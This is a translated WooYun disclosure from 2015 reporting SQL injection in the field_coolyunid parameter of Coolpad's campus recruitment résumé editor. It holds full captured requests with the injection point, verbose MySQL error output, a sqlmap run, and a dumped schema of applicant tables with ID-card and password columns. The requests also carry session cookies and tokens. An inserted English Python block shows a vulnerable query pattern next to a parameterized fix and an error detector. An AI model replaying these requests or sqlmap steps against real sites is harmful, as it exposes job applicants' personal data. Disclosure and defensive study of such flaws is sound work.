
Vulnerability summary

Defect ID: wooyun-2015-0126495

Title: Mobile industry security: multiple SQL injections at Yulong Communication (Coolpad) (appears to expose user résumés)

Vendor: yulong.com

Author: DloveJ

Submitted: 2015-07-13 16:49

Fix time: 2015-08-28 10:00

Publication time: 2015-08-28 10:00

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-13: Details sent to the vendor, awaiting vendor action
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and domain experts
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public

Brief description:

Mobile industry security: SQL injection at Yulong Communication (Coolpad) (can expose user résumés)

Details:

The injectable parameter is field_coolyunid= in every case.


http://campus.coolpad.com/

Log in and edit the résumé.

[screenshot: 1.jpg]


Testing shows that the following edit pages are injectable.
0x00
Personal info > Edit > Save, then capture the request:

POST /index.php?c=submitResumes&f=savePersonalInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 722
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; 
datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%22923343d9b5cc60459390386fd1f715da%22%7D%7D
field_coolyunid=32564674&field_preview=edit&info%5Bfield_photo%5D=public%2Fuploads%2F2015-07-13%2F14367740192603.jpg&info%5Bfield_realname%5D=%E9%83%BD%E6%98%AF&info%5Bfield_card_type%5D=idcard&info%5Bfield_idcard%5D=110101199609080097&info%5Bfield_sex%5D=gentleman&info%5Bfield_birthday%5D=1996-09-08&info%5Bfield_nation%5D=&info%5Bfield_health%5D=better&info%5Bfield_marital_status%5D=unmarried&info%5Bfield_political_status%5D=members&info%5Bfield_living_city%5D=sad&info%5Bfield_origin_palce%5D=dadad&info%5Bfield_before_colloge_residence%5D=%E5%B7%B4%E9%9F%B3%E9%83%AD%E6%A5%9E%E8%92%99%E5%8F%A4%E8%87%AA%E6%B2%BB%E5%B7%9E&info%5Bfield_graduation_time%5D=2015-01-01&info%5Bfield_height%5D=160&info%5Bfield_weight%5D=0


HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:27:31 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 899
<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_photo`='public/uploads/2015-07-13/14367740192603.jpg' , `s_realname`='都是' , `s_card_type`='idcard' , `s_idcard`='110101199609080097' , `s_sex`='gentleman' , `s_birthday`='1996-09-08' , `s_nation`='' , `s_health`='better' , `s_marital_status`='unmarried' , `s_political_status`='members' , `s_living_city`='sad' , `s_origin_palce`='dadad' , `s_before_colloge_residence`='巴音郭楞蒙古自治州' , `s_graduation_time`='2015-01-01' , `s_height`='160' , `s_weight`='0' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:27:30


0x01
Contact details > Edit > Save, then capture the request:

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 163
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; 
datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7D
field_coolyunid=32564674&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989


HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:29:50 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 525
<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_tel`='15099999999' , `s_email`='sddsa@qq.com' , `s_address`='' , `s_emergency_number`='15988880989' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:29:49


0x02
Skills/hobbies > Edit > Save, then capture the request:

POST /index.php?c=submitResumes&f=saveSkillsHobbiesInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 297
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit&r=0.38695669337175786
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; 
datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7D
field_coolyunid=32564674&hobb%5Bfield_english_level%5D=cet4&hobb%5Bfield_english_scores%5D=1132&hobb%5Bfield_english_certficate%5D=13&hobb%5Bfield_english_certficate_date%5D=2014-01-01&hobb%5Bfield_english_certficate_scores%5D=123&hobb%5Bfield_other_skills%5D=3&hobb%5Bfield_personal_hobbies%5D=31


HTTP/1.1 200 OK
Date: Mon, 13 Jul 2015 08:31:23 GMT
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.5.10
X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 439
<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) SELECT COUNT(*) FROM `clp_seekers_skills_hobbies` WHERE `s_id`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:31:23
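
The three error messages above show the same defect: the numeric field_coolyunid value is pasted straight into the WHERE clause, so a single trailing quote produces MySQL error 1064 and the raw statement is echoed back to the client. The following Python/SQLite snippet is an added illustration, not code from the Coolpad site: it reconstructs that query-building pattern (an assumption based on the error text) beside a hardened version that validates the uid as an integer and binds every value as a parameter, plus a check that flags responses leaking the verbose error banner. The table and column names come from the report; the rows are constructed sample data.

```python
import re
import sqlite3

# Constructed in-memory stand-in for clp_seekers (subset of the columns dumped below).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE clp_seekers (coolyun_uid INTEGER PRIMARY KEY, "
               "s_tel TEXT, s_email TEXT)")
    db.execute("INSERT INTO clp_seekers VALUES (32564674, '', '')")  # sample row
    db.execute("INSERT INTO clp_seekers VALUES (11111111, '', '')")  # sample row
    db.commit()
    return db

def save_connect_info_vulnerable(db, field_coolyunid, tel, email):
    # Assumed reconstruction of the pattern behind the 1064 error: every value,
    # including the uid, is concatenated into the statement text.
    sql = ("UPDATE clp_seekers SET s_tel='%s', s_email='%s' WHERE coolyun_uid=%s"
           % (tel, email, field_coolyunid))
    try:
        db.execute(sql)
        db.commit()
        return "ok"
    except sqlite3.Error as exc:
        # The real site returned this text to the browser; a stray quote in the
        # uid is enough to reach it.
        return "sql error: %s" % exc

def save_connect_info_fixed(db, field_coolyunid, tel, email):
    # Hardened form: reject anything that is not an integer uid before touching
    # the database, then bind all values so the SQL text never contains user input.
    try:
        uid = int(field_coolyunid)
    except (TypeError, ValueError):
        return "rejected: uid must be an integer"
    db.execute("UPDATE clp_seekers SET s_tel=?, s_email=? WHERE coolyun_uid=?",
               (tel, email, uid))
    db.commit()
    return "ok"

def rows_with_tel(db, tel):
    # Helper for checking which rows an update touched.
    return db.execute("SELECT COUNT(*) FROM clp_seekers WHERE s_tel=?",
                      (tel,)).fetchone()[0]

ERROR_BANNER = re.compile(r"A mysql error has occurred!.*Error Number:</strong>(\d+)")

def leaks_db_error(response_body):
    # Detection side: flag an HTTP 200 whose body carries the verbose MySQL error
    # page, as every response captured in the report does. Returns the error number.
    m = ERROR_BANNER.search(response_body)
    return int(m.group(1)) if m else None
```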


>>>>> Just saw the vendor confirmed the hole, and didn't expect it to be rated low; I'm not in the mood to write them up one by one, so I'll just run the tool. Look up the rest yourselves!! <<<<<
0x03
One of the requests:

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1
Host: campus.coolpad.com
Proxy-Connection: keep-alive
Content-Length: 164
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://campus.coolpad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; 
datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%7D%7D
field_coolyunid=32564674*&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989


Handed over to sqlmap.

[screenshot: 5.jpg]

[screenshot: 6.jpg]

[screenshot: 7.jpg]


Database: coolpadjobdb
[35 tables]
+---------------------------------+
| clp_college                     |
| clp_college_department          |
| clp_count_position              |
| clp_department                  |
| clp_department_managers         |
| clp_hiring                      |
| clp_hiring_employ               |
| clp_hiring_first                |
| clp_hiring_second               |
| clp_lecture                     |
| clp_managers                    |
| clp_managers_area               |
| clp_position                    |
| clp_position_city               |
| clp_position_interviewarea      |
| clp_position_type               |
| clp_position_workarea           |
| clp_preach_plan                 |
| clp_province                    |
| clp_ranks                       |
| clp_recruit_area                |
| clp_recruitment_dynamics        |
| clp_seekers                     |
| clp_seekers_active              |
| clp_seekers_audition            |
| clp_seekers_behave              |
| clp_seekers_connection          |
| clp_seekers_education           |
| clp_seekers_family_relationship |
| clp_seekers_practice_experience |
| clp_seekers_project_experience  |
| clp_seekers_self_evaluation     |
| clp_seekers_skills_hobbies      |
| statistics_datas                |
| statistics_status               |
+---------------------------------+


Database: coolpadjobdb
Table: clp_seekers
[38 columns]
+----------------------------+------------------------------------------------------------------------+
| Column                     | Type                                                                   |
+----------------------------+------------------------------------------------------------------------+
| coolyun_uid                | int(9)                                                                 |
| s_address                  | varchar(420)                                                           |
| s_before_colloge_residence | varchar(45)                                                            |
| s_birthday                 | timestamp                                                              |
| s_card_type                | enum('idcard','other')                                                 |
| s_edit_date                | datetime                                                               |
| s_email                    | varchar(24)                                                            |
| s_emergency_contact        | varchar(72)                                                            |
| s_emergency_contact_tel    | varchar(18)                                                            |
| s_emergency_number         | varchar(42)                                                            |
| s_eng_rank_goal            | varchar(12)                                                            |
| s_eng_rank_type            | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_expect_graduation        | timestamp                                                              |
| s_graduation_time          | datetime                                                               |
| s_health                   | enum('better','nice','bad')                                            |
| s_height                   | int(4)                                                                 |
| s_iconb                    | varchar(420)                                                           |
| s_icons                    | varchar(420)                                                           |
| s_id                       | int(8)                                                                 |
| s_idcard                   | varchar(20)                                                            |
| s_living_city              | varchar(45)                                                            |
| s_marital_status           | enum('married','unmarried','divorce','secret')                         |
| s_name                     | varchar(72)                                                            |
| s_nation                   | varchar(32)                                                            |
| s_origin_palce             | varchar(128)                                                           |
| s_other_eng_rank_goal      | varchar(12)                                                            |
| s_other_eng_rank_type      | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4','TEM8','BEC','CATTI') |
| s_other_lang_rank          | varchar(300)                                                           |
| s_password                 | varchar(32)                                                            |
| s_photo                    | varchar(300)                                                           |
| s_political_status         | enum('members','party','other')                                        |
| s_portrait                 | varchar(360)                                                           |
| s_realname                 | varchar(24)                                                            |
| s_save_date                | datetime                                                               |
| s_sex                      | enum('lady','gentleman')                                               |
| s_tel                      | varchar(18)                                                            |
| s_wechat                   | varchar(24)                                                            |
| s_weight                   | int(4)                                                                 |
+----------------------------+------------------------------------------------------------------------+


What this means, I don't know; see for yourselves!

Proof of vulnerability:

I sat here writing all this; can't you give it a 20? The last one was rated low too. Is that really fair?

Fix recommendation:

How about a high Rank of 20?

Copyright notice: when reposting, credit the source DloveJ@WooYun


Responses

Vendor response:

Severity: High

Rank: 12

Confirmed: 2015-07-14 09:58

Vendor reply:

Hello. Following the principle of fairness and impartiality, we assess each vulnerability on the difficulty of discovery, the difficulty of exploitation, and the degree of harm caused, and rate it accordingly. Thank you for your attention to Coolpad security.

Latest status:

None yet